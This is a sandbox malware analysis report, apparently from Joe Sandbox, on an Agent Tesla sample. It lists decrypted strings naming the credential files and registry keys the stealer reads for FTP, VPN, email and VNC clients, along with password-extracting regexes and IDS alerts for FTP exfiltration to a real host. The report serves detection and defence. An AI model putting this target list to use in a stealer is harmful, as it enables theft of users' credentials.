                        Source: 1.2.tTXQS6DONV.exe.3b38642.5.unpackString decryptor: Private Internet Access
                        Source: 1.2.tTXQS6DONV.exe.3b38642.5.unpackString decryptor: %ProgramW6432%
                        Source: 1.2.tTXQS6DONV.exe.3b38642.5.unpackString decryptor: Private Internet Access\data
                        Source: 1.2.tTXQS6DONV.exe.3b38642.5.unpackString decryptor: ProgramFiles(x86)
                        Source: 1.2.tTXQS6DONV.exe.3b38642.5.unpackString decryptor: \Private Internet Access\data
                        Source: 1.2.tTXQS6DONV.exe.3b38642.5.unpackString decryptor: \account.json
                        Source: 1.2.tTXQS6DONV.exe.3b38642.5.unpackString decryptor: .*"username":"(.*?)"
                        Source: 1.2.tTXQS6DONV.exe.3b38642.5.unpackString decryptor: .*"password":"(.*?)"
                        Source: 1.2.tTXQS6DONV.exe.3b38642.5.unpackString decryptor: Private Internet Access
                        Source: 1.2.tTXQS6DONV.exe.3b38642.5.unpackString decryptor: privateinternetaccess.com
                        Source: 1.2.tTXQS6DONV.exe.3b38642.5.unpackString decryptor: FileZilla
                        Source: 1.2.tTXQS6DONV.exe.3b38642.5.unpackString decryptor: APPDATA
                        Source: 1.2.tTXQS6DONV.exe.3b38642.5.unpackString decryptor: \FileZilla\recentservers.xml
                        Source: 1.2.tTXQS6DONV.exe.3b38642.5.unpackString decryptor: APPDATA
                        Source: 1.2.tTXQS6DONV.exe.3b38642.5.unpackString decryptor: \FileZilla\recentservers.xml
                        Source: 1.2.tTXQS6DONV.exe.3b38642.5.unpackString decryptor: <Server>
                        Source: 1.2.tTXQS6DONV.exe.3b38642.5.unpackString decryptor: <Host>
                        Source: 1.2.tTXQS6DONV.exe.3b38642.5.unpackString decryptor: <Host>
                        Source: 1.2.tTXQS6DONV.exe.3b38642.5.unpackString decryptor: </Host>
                        Source: 1.2.tTXQS6DONV.exe.3b38642.5.unpackString decryptor: <Port>
                        Source: 1.2.tTXQS6DONV.exe.3b38642.5.unpackString decryptor: </Port>
                        Source: 1.2.tTXQS6DONV.exe.3b38642.5.unpackString decryptor: <User>
                        Source: 1.2.tTXQS6DONV.exe.3b38642.5.unpackString decryptor: <User>
                        Source: 1.2.tTXQS6DONV.exe.3b38642.5.unpackString decryptor: </User>
                        Source: 1.2.tTXQS6DONV.exe.3b38642.5.unpackString decryptor: <Pass encoding="base64">
                        Source: 1.2.tTXQS6DONV.exe.3b38642.5.unpackString decryptor: <Pass encoding="base64">
                        Source: 1.2.tTXQS6DONV.exe.3b38642.5.unpackString decryptor: </Pass>
                        Source: 1.2.tTXQS6DONV.exe.3b38642.5.unpackString decryptor: <Pass>
                        Source: 1.2.tTXQS6DONV.exe.3b38642.5.unpackString decryptor: <Pass encoding="base64">
                        Source: 1.2.tTXQS6DONV.exe.3b38642.5.unpackString decryptor: </Pass>
                        Source: 1.2.tTXQS6DONV.exe.3b38642.5.unpackString decryptor: CoreFTP
                        Source: 1.2.tTXQS6DONV.exe.3b38642.5.unpackString decryptor: SOFTWARE\FTPWare\COREFTP\Sites
                        Source: 1.2.tTXQS6DONV.exe.3b38642.5.unpackString decryptor: User
                        Source: 1.2.tTXQS6DONV.exe.3b38642.5.unpackString decryptor: Host
                        Source: 1.2.tTXQS6DONV.exe.3b38642.5.unpackString decryptor: Port
                        Source: 1.2.tTXQS6DONV.exe.3b38642.5.unpackString decryptor: hdfzpysvpzimorhk
                        Source: 1.2.tTXQS6DONV.exe.3b38642.5.unpackString decryptor: WinSCP
                        Source: 1.2.tTXQS6DONV.exe.3b38642.5.unpackString decryptor: SOFTWARE\Martin Prikryl\WinSCP 2\Sessions
                        Source: 1.2.tTXQS6DONV.exe.3b38642.5.unpackString decryptor: HostName
                        Source: 1.2.tTXQS6DONV.exe.3b38642.5.unpackString decryptor: UserName
                        Source: 1.2.tTXQS6DONV.exe.3b38642.5.unpackString decryptor: Password
                        Source: 1.2.tTXQS6DONV.exe.3b38642.5.unpackString decryptor: PublicKeyFile
                        Source: 1.2.tTXQS6DONV.exe.3b38642.5.unpackString decryptor: PortNumber
                        Source: 1.2.tTXQS6DONV.exe.3b38642.5.unpackString decryptor: [PRIVATE KEY LOCATION: "{0}"]
                        Source: 1.2.tTXQS6DONV.exe.3b38642.5.unpackString decryptor: WinSCP
                        Source: 1.2.tTXQS6DONV.exe.3b38642.5.unpackString decryptor: ABCDEF
                        Source: 1.2.tTXQS6DONV.exe.3b38642.5.unpackString decryptor: Flash FXP
                        Source: 1.2.tTXQS6DONV.exe.3b38642.5.unpackString decryptor: port
                        Source: 1.2.tTXQS6DONV.exe.3b38642.5.unpackString decryptor: user
                        Source: 1.2.tTXQS6DONV.exe.3b38642.5.unpackString decryptor: pass
                        Source: 1.2.tTXQS6DONV.exe.3b38642.5.unpackString decryptor: quick.dat
                        Source: 1.2.tTXQS6DONV.exe.3b38642.5.unpackString decryptor: Sites.dat
                        Source: 1.2.tTXQS6DONV.exe.3b38642.5.unpackString decryptor: \FlashFXP\
                        Source: 1.2.tTXQS6DONV.exe.3b38642.5.unpackString decryptor: \FlashFXP\
                        Source: 1.2.tTXQS6DONV.exe.3b38642.5.unpackString decryptor: yA36zA48dEhfrvghGRg57h5UlDv3
                        Source: 1.2.tTXQS6DONV.exe.3b38642.5.unpackString decryptor: FTP Navigator
                        Source: 1.2.tTXQS6DONV.exe.3b38642.5.unpackString decryptor: SystemDrive
                        Source: 1.2.tTXQS6DONV.exe.3b38642.5.unpackString decryptor: \FTP Navigator\Ftplist.txt
                        Source: 1.2.tTXQS6DONV.exe.3b38642.5.unpackString decryptor: Server
                        Source: 1.2.tTXQS6DONV.exe.3b38642.5.unpackString decryptor: Password
                        Source: 1.2.tTXQS6DONV.exe.3b38642.5.unpackString decryptor: No Password
                        Source: 1.2.tTXQS6DONV.exe.3b38642.5.unpackString decryptor: User
                        Source: 1.2.tTXQS6DONV.exe.3b38642.5.unpackString decryptor: SmartFTP
                        Source: 1.2.tTXQS6DONV.exe.3b38642.5.unpackString decryptor: APPDATA
                        Source: 1.2.tTXQS6DONV.exe.3b38642.5.unpackString decryptor: SmartFTP\Client 2.0\Favorites\Quick Connect
                        Source: 1.2.tTXQS6DONV.exe.3b38642.5.unpackString decryptor: WS_FTP
                        Source: 1.2.tTXQS6DONV.exe.3b38642.5.unpackString decryptor: appdata
                        Source: 1.2.tTXQS6DONV.exe.3b38642.5.unpackString decryptor: Ipswitch\WS_FTP\Sites\ws_ftp.ini
                        Source: 1.2.tTXQS6DONV.exe.3b38642.5.unpackString decryptor: HOST
                        Source: 1.2.tTXQS6DONV.exe.3b38642.5.unpackString decryptor: PWD=
                        Source: 1.2.tTXQS6DONV.exe.3b38642.5.unpackString decryptor: PWD=
                        Source: 1.2.tTXQS6DONV.exe.3b38642.5.unpackString decryptor: FtpCommander
                        Source: 1.2.tTXQS6DONV.exe.3b38642.5.unpackString decryptor: SystemDrive
                        Source: 1.2.tTXQS6DONV.exe.3b38642.5.unpackString decryptor: \Program Files (x86)\FTP Commander Deluxe\Ftplist.txt
                        Source: 1.2.tTXQS6DONV.exe.3b38642.5.unpackString decryptor: SystemDrive
                        Source: 1.2.tTXQS6DONV.exe.3b38642.5.unpackString decryptor: \Program Files (x86)\FTP Commander\Ftplist.txt
                        Source: 1.2.tTXQS6DONV.exe.3b38642.5.unpackString decryptor: SystemDrive
                        Source: 1.2.tTXQS6DONV.exe.3b38642.5.unpackString decryptor: \cftp\Ftplist.txt
                        Source: 1.2.tTXQS6DONV.exe.3b38642.5.unpackString decryptor: \VirtualStore\Program Files (x86)\FTP Commander\Ftplist.txt
                        Source: 1.2.tTXQS6DONV.exe.3b38642.5.unpackString decryptor: \VirtualStore\Program Files (x86)\FTP Commander Deluxe\Ftplist.txt
                        Source: 1.2.tTXQS6DONV.exe.3b38642.5.unpackString decryptor: ;Password=
                        Source: 1.2.tTXQS6DONV.exe.3b38642.5.unpackString decryptor: ;User=
                        Source: 1.2.tTXQS6DONV.exe.3b38642.5.unpackString decryptor: ;Server=
                        Source: 1.2.tTXQS6DONV.exe.3b38642.5.unpackString decryptor: ;Port=
                        Source: 1.2.tTXQS6DONV.exe.3b38642.5.unpackString decryptor: ;Port=
                        Source: 1.2.tTXQS6DONV.exe.3b38642.5.unpackString decryptor: ;Password=
                        Source: 1.2.tTXQS6DONV.exe.3b38642.5.unpackString decryptor: ;User=
                        Source: 1.2.tTXQS6DONV.exe.3b38642.5.unpackString decryptor: ;Anonymous=
                        Source: 1.2.tTXQS6DONV.exe.3b38642.5.unpackString decryptor: FTPGetter
                        Source: 1.2.tTXQS6DONV.exe.3b38642.5.unpackString decryptor: \FTPGetter\servers.xml
                        Source: 1.2.tTXQS6DONV.exe.3b38642.5.unpackString decryptor: <server>
                        Source: 1.2.tTXQS6DONV.exe.3b38642.5.unpackString decryptor: <server_ip>
                        Source: 1.2.tTXQS6DONV.exe.3b38642.5.unpackString decryptor: <server_ip>
                        Source: 1.2.tTXQS6DONV.exe.3b38642.5.unpackString decryptor: </server_ip>
                        Source: 1.2.tTXQS6DONV.exe.3b38642.5.unpackString decryptor: <server_port>
                        Source: 1.2.tTXQS6DONV.exe.3b38642.5.unpackString decryptor: </server_port>
                        Source: 1.2.tTXQS6DONV.exe.3b38642.5.unpackString decryptor: <server_user_name>
                        Source: 1.2.tTXQS6DONV.exe.3b38642.5.unpackString decryptor: <server_user_name>
                        Source: 1.2.tTXQS6DONV.exe.3b38642.5.unpackString decryptor: </server_user_name>
                        Source: 1.2.tTXQS6DONV.exe.3b38642.5.unpackString decryptor: <server_user_password>
                        Source: 1.2.tTXQS6DONV.exe.3b38642.5.unpackString decryptor: <server_user_password>
                        Source: 1.2.tTXQS6DONV.exe.3b38642.5.unpackString decryptor: </server_user_password>
                        Source: 1.2.tTXQS6DONV.exe.3b38642.5.unpackString decryptor: FTPGetter
                        Source: 1.2.tTXQS6DONV.exe.3b38642.5.unpackString decryptor: The Bat!
                        Source: 1.2.tTXQS6DONV.exe.3b38642.5.unpackString decryptor: appdata
                        Source: 1.2.tTXQS6DONV.exe.3b38642.5.unpackString decryptor: \The Bat!
                        Source: 1.2.tTXQS6DONV.exe.3b38642.5.unpackString decryptor: \Account.CFN
                        Source: 1.2.tTXQS6DONV.exe.3b38642.5.unpackString decryptor: \Account.CFN
                        Source: 1.2.tTXQS6DONV.exe.3b38642.5.unpackString decryptor: =-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
                        Source: 1.2.tTXQS6DONV.exe.3b38642.5.unpackString decryptor: +-0123456789ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz
                        Source: 1.2.tTXQS6DONV.exe.3b38642.5.unpackString decryptor: Becky!
                        Source: 1.2.tTXQS6DONV.exe.3b38642.5.unpackString decryptor: HKEY_CURRENT_USER\Software\RimArts\B2\Settings
                        Source: 1.2.tTXQS6DONV.exe.3b38642.5.unpackString decryptor: DataDir
                        Source: 1.2.tTXQS6DONV.exe.3b38642.5.unpackString decryptor: Folder.lst
                        Source: 1.2.tTXQS6DONV.exe.3b38642.5.unpackString decryptor: \Mailbox.ini
                        Source: 1.2.tTXQS6DONV.exe.3b38642.5.unpackString decryptor: Account
                        Source: 1.2.tTXQS6DONV.exe.3b38642.5.unpackString decryptor: PassWd
                        Source: 1.2.tTXQS6DONV.exe.3b38642.5.unpackString decryptor: Account
                        Source: 1.2.tTXQS6DONV.exe.3b38642.5.unpackString decryptor: SMTPServer
                        Source: 1.2.tTXQS6DONV.exe.3b38642.5.unpackString decryptor: Account
                        Source: 1.2.tTXQS6DONV.exe.3b38642.5.unpackString decryptor: MailAddress
                        Source: 1.2.tTXQS6DONV.exe.3b38642.5.unpackString decryptor: Becky!
                        Source: 1.2.tTXQS6DONV.exe.3b38642.5.unpackString decryptor: Outlook
                        Source: 1.2.tTXQS6DONV.exe.3b38642.5.unpackString decryptor: Software\Microsoft\Office\15.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676
                        Source: 1.2.tTXQS6DONV.exe.3b38642.5.unpackString decryptor: Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676
                        Source: 1.2.tTXQS6DONV.exe.3b38642.5.unpackString decryptor: Software\Microsoft\Windows Messaging Subsystem\Profiles\9375CFF0413111d3B88A00104B2A6676
                        Source: 1.2.tTXQS6DONV.exe.3b38642.5.unpackString decryptor: Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676
                        Source: 1.2.tTXQS6DONV.exe.3b38642.5.unpackString decryptor: Email
                        Source: 1.2.tTXQS6DONV.exe.3b38642.5.unpackString decryptor: IMAP Password
                        Source: 1.2.tTXQS6DONV.exe.3b38642.5.unpackString decryptor: POP3 Password
                        Source: 1.2.tTXQS6DONV.exe.3b38642.5.unpackString decryptor: HTTP Password
                        Source: 1.2.tTXQS6DONV.exe.3b38642.5.unpackString decryptor: SMTP Password
                        Source: 1.2.tTXQS6DONV.exe.3b38642.5.unpackString decryptor: Email
                        Source: 1.2.tTXQS6DONV.exe.3b38642.5.unpackString decryptor: Email
                        Source: 1.2.tTXQS6DONV.exe.3b38642.5.unpackString decryptor: Email
                        Source: 1.2.tTXQS6DONV.exe.3b38642.5.unpackString decryptor: IMAP Password
                        Source: 1.2.tTXQS6DONV.exe.3b38642.5.unpackString decryptor: POP3 Password
                        Source: 1.2.tTXQS6DONV.exe.3b38642.5.unpackString decryptor: HTTP Password
                        Source: 1.2.tTXQS6DONV.exe.3b38642.5.unpackString decryptor: SMTP Password
                        Source: 1.2.tTXQS6DONV.exe.3b38642.5.unpackString decryptor: Server
                        Source: 1.2.tTXQS6DONV.exe.3b38642.5.unpackString decryptor: Windows Mail App
                        Source: 1.2.tTXQS6DONV.exe.3b38642.5.unpackString decryptor: COMPlus_legacyCorruptedStateExceptionsPolicy
                        Source: 1.2.tTXQS6DONV.exe.3b38642.5.unpackString decryptor: Software\Microsoft\ActiveSync\Partners
                        Source: 1.2.tTXQS6DONV.exe.3b38642.5.unpackString decryptor: Email
                        Source: 1.2.tTXQS6DONV.exe.3b38642.5.unpackString decryptor: Server
                        Source: 1.2.tTXQS6DONV.exe.3b38642.5.unpackString decryptor: SchemaId
                        Source: 1.2.tTXQS6DONV.exe.3b38642.5.unpackString decryptor: pResourceElement
                        Source: 1.2.tTXQS6DONV.exe.3b38642.5.unpackString decryptor: pIdentityElement
                        Source: 1.2.tTXQS6DONV.exe.3b38642.5.unpackString decryptor: pPackageSid
                        Source: 1.2.tTXQS6DONV.exe.3b38642.5.unpackString decryptor: pAuthenticatorElement
                        Source: 1.2.tTXQS6DONV.exe.3b38642.5.unpackString decryptor: syncpassword
                        Source: 1.2.tTXQS6DONV.exe.3b38642.5.unpackString decryptor: mailoutgoing
                        Source: 1.2.tTXQS6DONV.exe.3b38642.5.unpackString decryptor: FoxMail
                        Source: 1.2.tTXQS6DONV.exe.3b38642.5.unpackString decryptor: HKEY_CURRENT_USER\Software\Aerofox\FoxmailPreview
                        Source: 1.2.tTXQS6DONV.exe.3b38642.5.unpackString decryptor: Executable
                        Source: 1.2.tTXQS6DONV.exe.3b38642.5.unpackString decryptor: HKEY_CURRENT_USER\Software\Aerofox\Foxmail\V3.1
                        Source: 1.2.tTXQS6DONV.exe.3b38642.5.unpackString decryptor: FoxmailPath
                        Source: 1.2.tTXQS6DONV.exe.3b38642.5.unpackString decryptor: \Storage\
                        Source: 1.2.tTXQS6DONV.exe.3b38642.5.unpackString decryptor: \Storage\
                        Source: 1.2.tTXQS6DONV.exe.3b38642.5.unpackString decryptor: \mail
                        Source: 1.2.tTXQS6DONV.exe.3b38642.5.unpackString decryptor: \mail
                        Source: 1.2.tTXQS6DONV.exe.3b38642.5.unpackString decryptor: \VirtualStore\Program Files\Foxmail\mail
                        Source: 1.2.tTXQS6DONV.exe.3b38642.5.unpackString decryptor: \VirtualStore\Program Files\Foxmail\mail
                        Source: 1.2.tTXQS6DONV.exe.3b38642.5.unpackString decryptor: \VirtualStore\Program Files (x86)\Foxmail\mail
                        Source: 1.2.tTXQS6DONV.exe.3b38642.5.unpackString decryptor: \VirtualStore\Program Files (x86)\Foxmail\mail
                        Source: 1.2.tTXQS6DONV.exe.3b38642.5.unpackString decryptor: \Accounts\Account.rec0
                        Source: 1.2.tTXQS6DONV.exe.3b38642.5.unpackString decryptor: \Accounts\Account.rec0
                        Source: 1.2.tTXQS6DONV.exe.3b38642.5.unpackString decryptor: \Account.stg
                        Source: 1.2.tTXQS6DONV.exe.3b38642.5.unpackString decryptor: \Account.stg
                        Source: 1.2.tTXQS6DONV.exe.3b38642.5.unpackString decryptor: POP3Host
                        Source: 1.2.tTXQS6DONV.exe.3b38642.5.unpackString decryptor: SMTPHost
                        Source: 1.2.tTXQS6DONV.exe.3b38642.5.unpackString decryptor: IncomingServer
                        Source: 1.2.tTXQS6DONV.exe.3b38642.5.unpackString decryptor: Account
                        Source: 1.2.tTXQS6DONV.exe.3b38642.5.unpackString decryptor: MailAddress
                        Source: 1.2.tTXQS6DONV.exe.3b38642.5.unpackString decryptor: Password
                        Source: 1.2.tTXQS6DONV.exe.3b38642.5.unpackString decryptor: POP3Password
                        Source: 1.2.tTXQS6DONV.exe.3b38642.5.unpackString decryptor: Opera Mail
                        Source: 1.2.tTXQS6DONV.exe.3b38642.5.unpackString decryptor: \Opera Mail\Opera Mail\wand.dat
                        Source: 1.2.tTXQS6DONV.exe.3b38642.5.unpackString decryptor: \Opera Mail\Opera Mail\wand.dat
                        Source: 1.2.tTXQS6DONV.exe.3b38642.5.unpackString decryptor: opera:
                        Source: 1.2.tTXQS6DONV.exe.3b38642.5.unpackString decryptor: abcdefghijklmnopqrstuvwxyz1234567890_-.~!@#$%^&*()[{]}\|';:,<>/?+=
                        Source: 1.2.tTXQS6DONV.exe.3b38642.5.unpackString decryptor: PocoMail
                        Source: 1.2.tTXQS6DONV.exe.3b38642.5.unpackString decryptor: appdata
                        Source: 1.2.tTXQS6DONV.exe.3b38642.5.unpackString decryptor: \Pocomail\accounts.ini
                        Source: 1.2.tTXQS6DONV.exe.3b38642.5.unpackString decryptor: Email
                        Source: 1.2.tTXQS6DONV.exe.3b38642.5.unpackString decryptor: POPPass
                        Source: 1.2.tTXQS6DONV.exe.3b38642.5.unpackString decryptor: SMTPPass
                        Source: 1.2.tTXQS6DONV.exe.3b38642.5.unpackString decryptor: SMTP
                        Source: 1.2.tTXQS6DONV.exe.3b38642.5.unpackString decryptor: eM Client
                        Source: 1.2.tTXQS6DONV.exe.3b38642.5.unpackString decryptor: eM Client\accounts.dat
                        Source: 1.2.tTXQS6DONV.exe.3b38642.5.unpackString decryptor: eM Client
                        Source: 1.2.tTXQS6DONV.exe.3b38642.5.unpackString decryptor: Accounts
                        Source: 1.2.tTXQS6DONV.exe.3b38642.5.unpackString decryptor: "Username":"
                        Source: 1.2.tTXQS6DONV.exe.3b38642.5.unpackString decryptor: "Secret":"
                        Source: 1.2.tTXQS6DONV.exe.3b38642.5.unpackString decryptor: 72905C47-F4FD-4CF7-A489-4E8121A155BD
                        Source: 1.2.tTXQS6DONV.exe.3b38642.5.unpackString decryptor: "ProviderName":"
                        Source: 1.2.tTXQS6DONV.exe.3b38642.5.unpackString decryptor: o6806642kbM7c5
                        Source: 1.2.tTXQS6DONV.exe.3b38642.5.unpackString decryptor: Mailbird
                        Source: 1.2.tTXQS6DONV.exe.3b38642.5.unpackString decryptor: SenderIdentities
                        Source: 1.2.tTXQS6DONV.exe.3b38642.5.unpackString decryptor: Accounts
                        Source: 1.2.tTXQS6DONV.exe.3b38642.5.unpackString decryptor: \Mailbird\Store\Store.db
                        Source: 1.2.tTXQS6DONV.exe.3b38642.5.unpackString decryptor: Server_Host
                        Source: 1.2.tTXQS6DONV.exe.3b38642.5.unpackString decryptor: Accounts
                        Source: 1.2.tTXQS6DONV.exe.3b38642.5.unpackString decryptor: Email
                        Source: 1.2.tTXQS6DONV.exe.3b38642.5.unpackString decryptor: Username
                        Source: 1.2.tTXQS6DONV.exe.3b38642.5.unpackString decryptor: EncryptedPassword
                        Source: 1.2.tTXQS6DONV.exe.3b38642.5.unpackString decryptor: Mailbird
                        Source: 1.2.tTXQS6DONV.exe.3b38642.5.unpackString decryptor: RealVNC 4.x
                        Source: 1.2.tTXQS6DONV.exe.3b38642.5.unpackString decryptor: SOFTWARE\Wow6432Node\RealVNC\WinVNC4
                        Source: 1.2.tTXQS6DONV.exe.3b38642.5.unpackString decryptor: Password
                        Source: 1.2.tTXQS6DONV.exe.3b38642.5.unpackString decryptor: RealVNC 3.x
                        Source: 1.2.tTXQS6DONV.exe.3b38642.5.unpackString decryptor: SOFTWARE\RealVNC\vncserver
                        Source: 1.2.tTXQS6DONV.exe.3b38642.5.unpackString decryptor: Password
                        Source: 1.2.tTXQS6DONV.exe.3b38642.5.unpackString decryptor: RealVNC 4.x
                        Source: 1.2.tTXQS6DONV.exe.3b38642.5.unpackString decryptor: SOFTWARE\RealVNC\WinVNC4
                        Source: 1.2.tTXQS6DONV.exe.3b38642.5.unpackString decryptor: Password
                        Source: 1.2.tTXQS6DONV.exe.3b38642.5.unpackString decryptor: RealVNC 3.x
                        Source: 1.2.tTXQS6DONV.exe.3b38642.5.unpackString decryptor: Software\ORL\WinVNC3
                        Source: 1.2.tTXQS6DONV.exe.3b38642.5.unpackString decryptor: Password
                        Source: 1.2.tTXQS6DONV.exe.3b38642.5.unpackString decryptor: TightVNC
                        Source: 1.2.tTXQS6DONV.exe.3b38642.5.unpackString decryptor: Software\TightVNC\Server
                        Source: 1.2.tTXQS6DONV.exe.3b38642.5.unpackString decryptor: Password
                        Source: 1.2.tTXQS6DONV.exe.3b38642.5.unpackString decryptor: TightVNC
                        Source: 1.2.tTXQS6DONV.exe.3b38642.5.unpackString decryptor: Software\TightVNC\Server
                        Source: 1.2.tTXQS6DONV.exe.3b38642.5.unpackString decryptor: PasswordViewOnly
                        Source: 1.2.tTXQS6DONV.exe.3b38642.5.unpackString decryptor: TightVNC ControlPassword
                        Source: 1.2.tTXQS6DONV.exe.3b38642.5.unpackString decryptor: Software\TightVNC\Server
                        Source: 1.2.tTXQS6DONV.exe.3b38642.5.unpackString decryptor: ControlPassword
                        Source: 1.2.tTXQS6DONV.exe.3b38642.5.unpackString decryptor: TigerVNC
                        Source: 1.2.tTXQS6DONV.exe.3b38642.5.unpackString decryptor: Software\TigerVNC\Server
                        Source: 1.2.tTXQS6DONV.exe.3b38642.5.unpackString decryptor: Password
                        Source: 1.2.tTXQS6DONV.exe.3b38642.5.unpackString decryptor: UltraVNC
                        Source: 1.2.tTXQS6DONV.exe.3b38642.5.unpackString decryptor: ProgramFiles(x86)
                        Source: 1.2.tTXQS6DONV.exe.3b38642.5.unpackString decryptor: \uvnc bvba\UltraVNC\ultravnc.ini
                        Source: 1.2.tTXQS6DONV.exe.3b38642.5.unpackString decryptor: passwd
                        Source: 1.2.tTXQS6DONV.exe.3b38642.5.unpackString decryptor: UltraVNC
                        Source: 1.2.tTXQS6DONV.exe.3b38642.5.unpackString decryptor: ProgramFiles(x86)
                        Source: 1.2.tTXQS6DONV.exe.3b38642.5.unpackString decryptor: \uvnc bvba\UltraVNC\ultravnc.ini
                        Source: 1.2.tTXQS6DONV.exe.3b38642.5.unpackString decryptor: passwd2
                        Source: 1.2.tTXQS6DONV.exe.3b38642.5.unpackString decryptor: UltraVNC
                        Source: 1.2.tTXQS6DONV.exe.3b38642.5.unpackString decryptor: ProgramFiles
                        Source: 1.2.tTXQS6DONV.exe.3b38642.5.unpackString decryptor: \uvnc bvba\UltraVNC\ultravnc.ini
                        Source: 1.2.tTXQS6DONV.exe.3b38642.5.unpackString decryptor: passwd
                        Source: 1.2.tTXQS6DONV.exe.3b38642.5.unpackString decryptor: UltraVNC
                        Source: 1.2.tTXQS6DONV.exe.3b38642.5.unpackString decryptor: ProgramFiles
                        Source: 1.2.tTXQS6DONV.exe.3b38642.5.unpackString decryptor: \uvnc bvba\UltraVNC\ultravnc.ini
                        Source: 1.2.tTXQS6DONV.exe.3b38642.5.unpackString decryptor: passwd2
                        Source: 1.2.tTXQS6DONV.exe.3b38642.5.unpackString decryptor: UltraVNC
                        Source: 1.2.tTXQS6DONV.exe.3b38642.5.unpackString decryptor: ProgramFiles
                        Source: 1.2.tTXQS6DONV.exe.3b38642.5.unpackString decryptor: \UltraVNC\ultravnc.ini
                        Source: 1.2.tTXQS6DONV.exe.3b38642.5.unpackString decryptor: passwd
                        Source: 1.2.tTXQS6DONV.exe.3b38642.5.unpackString decryptor: UltraVNC
                        Source: 1.2.tTXQS6DONV.exe.3b38642.5.unpackString decryptor: ProgramFiles
                        Source: 1.2.tTXQS6DONV.exe.3b38642.5.unpackString decryptor: \UltraVNC\ultravnc.ini
                        Source: 1.2.tTXQS6DONV.exe.3b38642.5.unpackString decryptor: passwd2
                        Source: 1.2.tTXQS6DONV.exe.3b38642.5.unpackString decryptor: UltraVNC
                        Source: 1.2.tTXQS6DONV.exe.3b38642.5.unpackString decryptor: ProgramFiles(x86)
                        Source: 1.2.tTXQS6DONV.exe.3b38642.5.unpackString decryptor: \UltraVNC\ultravnc.ini
                        Source: 1.2.tTXQS6DONV.exe.3b38642.5.unpackString decryptor: passwd
                        Source: 1.2.tTXQS6DONV.exe.3b38642.5.unpackString decryptor: UltraVNC
                        Source: 1.2.tTXQS6DONV.exe.3b38642.5.unpackString decryptor: ProgramFiles(x86)
                        Source: 1.2.tTXQS6DONV.exe.3b38642.5.unpackString decryptor: \UltraVNC\ultravnc.ini
                        Source: tTXQS6DONV.exeStatic PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
                        Source: tTXQS6DONV.exeStatic PE information: HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE

                        Networking

                        barindex
                        Suricata IDS alerts for network traffic
                        Source: Network trafficSuricata IDS: 2855542 - Severity 1 - ETPRO MALWARE Agent Tesla CnC Exfil Activity : 192.168.2.6:49881 -> 162.241.203.30:34513
                        Source: Network trafficSuricata IDS: 2029927 - Severity 1 - ET MALWARE AgentTesla Exfil via FTP : 192.168.2.6:49872 -> 162.241.203.30:21
                        Source: global trafficTCP traffic: 192.168.2.6:49881 -> 162.241.203.30:34513
                        Source: Joe Sandbox ViewIP Address: 162.241.203.30 162.241.203.30
                        Source: Joe Sandbox ViewIP Address: 162.241.203.30 162.241.203.30
                        Source: Joe Sandbox ViewASN Name: OIS1US OIS1US
                        Source: unknownFTP traffic detected: 162.241.203.30:21 -> 192.168.2.6:49872 220---------- Welcome to Pure-FTPd [privsep] [TLS] ---------- 220---------- Welcome to Pure-FTPd [privsep] [TLS] ----------220-You are user number 13 of 150 allowed. 220---------- Welcome to Pure-FTPd [privsep] [TLS] ----------220-You are user number 13 of 150 allowed.220-Local time is now 13:15. Server port: 21. 220---------- Welcome to Pure-FTPd [privsep] [TLS] ----------220-You are user number 13 of 150 allowed.220-Local time is now 13:15. Server port: 21.220-IPv6 connections are also welcome on this server. 220---------- Welcome to Pure-FTPd [privsep] [TLS] ----------220-You are user number 13 of 150 allowed.220-Local time is now 13:15. Server port: 21.220-IPv6 connections are also welcome on this server.220 You will be disconnected after 15 minutes of inactivity.
                        Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                        Source: global trafficDNS traffic detected: DNS query: ftp.aminhacorretora.com.br
                        Source: InstallUtil.exe, 00000005.00000002.3409149814.00000000032B1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://aminhacorretora.com.br
                        Source: InstallUtil.exe, 00000005.00000002.3409149814.00000000032B1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://ftp.aminhacorretora.com.br
                        Source: InstallUtil.exe, 00000005.00000002.3409149814.00000000032B1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
                        Source: C:\Users\user\Desktop\tTXQS6DONV.exeCode function: 1_2_07B9BC58 CreateProcessAsUserW,1_2_07B9BC58
                        Source: C:\Users\user\Desktop\tTXQS6DONV.exeCode function: 1_2_00CC12B01_2_00CC12B0
                        Source: C:\Users\user\Desktop\tTXQS6DONV.exeCode function: 1_2_00CC09501_2_00CC0950
                        Source: C:\Users\user\Desktop\tTXQS6DONV.exeCode function: 1_2_00E886581_2_00E88658
                        Source: C:\Users\user\Desktop\tTXQS6DONV.exeCode function: 1_2_00E87EF01_2_00E87EF0
                        Source: C:\Users\user\Desktop\tTXQS6DONV.exeCode function: 1_2_055A4A581_2_055A4A58
                        Source: C:\Users\user\Desktop\tTXQS6DONV.exeCode function: 1_2_055A00741_2_055A0074
                        Source: C:\Users\user\Desktop\tTXQS6DONV.exeCode function: 1_2_05E745601_2_05E74560
                        Source: C:\Users\user\Desktop\tTXQS6DONV.exeCode function: 1_2_05E700401_2_05E70040
                        Source: C:\Users\user\Desktop\tTXQS6DONV.exeCode function: 1_2_05E700061_2_05E70006
                        Source: C:\Users\user\Desktop\tTXQS6DONV.exeCode function: 1_2_0742CF081_2_0742CF08
                        Source: C:\Users\user\Desktop\tTXQS6DONV.exeCode function: 1_2_0742EFF81_2_0742EFF8
                        Source: C:\Users\user\Desktop\tTXQS6DONV.exeCode function: 1_2_0742D7901_2_0742D790
                        Source: C:\Users\user\Desktop\tTXQS6DONV.exeCode function: 1_2_0742AE601_2_0742AE60
                        Source: C:\Users\user\Desktop\tTXQS6DONV.exeCode function: 1_2_0742BEF81_2_0742BEF8
